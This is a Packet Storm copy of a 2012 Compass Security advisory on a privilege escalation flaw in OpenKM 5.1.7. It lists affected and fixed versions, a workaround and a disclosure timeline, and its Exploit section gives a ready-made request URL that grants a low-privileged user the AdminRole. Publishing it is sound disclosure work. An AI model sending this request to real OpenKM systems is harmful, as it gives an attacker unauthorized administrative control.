OpenKM Document Management System 5.1.7 Privilege Escalation

2012-01-03T00:00:00
ID PACKETSTORM:108322
Type packetstorm
Reporter Cyrill Brunschwiler
Modified 2012-01-03T00:00:00

Description

                                        
                                            `########################################################################  
##  
#  
# COMPASS SECURITY ADVISORY http://www.csnc.ch/   
########################################################################  
##  
#  
# ID: COMPASS-2012-001  
# Product: OpenKM Document Management System 5.1.7 [1]  
# Vendor: OpenKM http://www.openkm.com/  
# Subject: Privilege Escalation, Improper Access Control  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Cyrill Brunschwiler (cyrill.brunschwiler@csnc.ch)  
# Date: August 6th 2011  
#  
########################################################################  
##  
  
Description:  
------------  
Cyrill Brunschwiler, Security Analyst at Compass Security Network  
Computing,  
Switzerland discovered an authorization flaw in the OpenKM solution.  
OpenKM  
does allow application administrators to manage users and to assign  
roles.  
Unfortunately, a standard user having the UserRole may alter the roles  
of  
existing account. This is possible because OpenKM does not properly  
check  
for the sufficient privileges. The changes are being applied even though  
the  
OpenKM user interface displays an "insufficient privileges" message to  
the  
unprivileged user.  
  
Vulnerable:  
-----------  
OpenKM version 5.1.7  
  
Not vulnerable:  
---------------  
OpenKM version 5.1.8  
  
Workaround:  
-----------  
Grant access to /OpenKM/admin path to specific IPs only (requires  
additional  
WAF, Reverse Proxy setup[2] or web server IP restriction)  
  
Exploit:  
--------  
Login as low privileged User (having the UserRole) and call the  
following  
URL to gain administrative privileges.  
  
http://example.com/OpenKM/admin/Auth?action=userEdit&persist=true&usr_id  
=usr&usr_active=on&usr_roles=AdminRole  
  
Timeline:  
---------  
August 6th, Vulnerability discovered  
August 9th, Vendor contacted  
August 10th, Vendor notified  
December 1st, Patched version released  
January 2nd, Advisory released  
  
References:  
-----------  
[1] OpenKM http://www.openkm.com/  
is an Free/Libre document management system that provides a web  
interface for  
managing arbitrary files. OpenKM includes a content repository, Lucene  
indexing, and jBPM workflow. The OpenKM system was developed using Java  
technology.  
  
[2] Open Source Web Entry Server   
Talk at OWASP Appsec Washington D.C. in November 2010 about setting up  
an   
Apache based Open Source Web Entry Server  
https://www.owasp.org/images/f/f4/AppSecDC_Open_Source_Web_Entry_Server_  
V2.2.ppt  
`